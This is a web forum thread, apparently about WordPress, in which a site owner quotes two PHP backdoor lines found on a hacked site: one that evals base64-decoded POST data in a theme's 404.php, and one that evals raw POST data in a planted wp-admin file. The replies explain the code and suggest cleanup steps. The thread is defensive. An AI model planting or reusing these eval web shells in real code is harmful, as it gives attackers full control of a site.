Suspicious Files

Hi I found two suspicious files on my site:

  1. The first in my theme (404.php), with this line added

    Read More

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

  2. The second in /wp-admin/ called wp-class.php.

    The only line there was: <?eval($_POST[joao]);?>

Can anyone tell me what are this doing, and what steps should I take ?

Related posts

Leave a Reply


    1. When someone sends a POST request with a variable php and a base 64 encoded value that is PHP code after decoding it, that PHP code will run with the permissions of all your own PHP files. The attacker can read all database content, create new users, upload files …

    2. The second code does the same, just without encoding the PHP.

    Both injections are rather primitive; they look almost as if they should be found to make you feel safe when you remove them.

    It is very likely that these snippets are not the only problems. The attacker has used his new site probably and added some files. Read Verifying that I have fully removed a WordPress hack? and follow all suggestions mentioned there.

    Find the back door. Read your log files if they aren’t already compromised.

  1. Those lines of code are almost surely malicious. To hinder the webmaster’s ability to search for strings, malicious content is often hidden in an encoded format, like base64.

    In my experience, the most common version of this attack outputs a hidden iframe that loads an external malicious URL (which may be used for a number of purposes).

    Scan your site with Quttera (internally) and Sucuri (externally) and see if you can identify and remove all instances of the attack.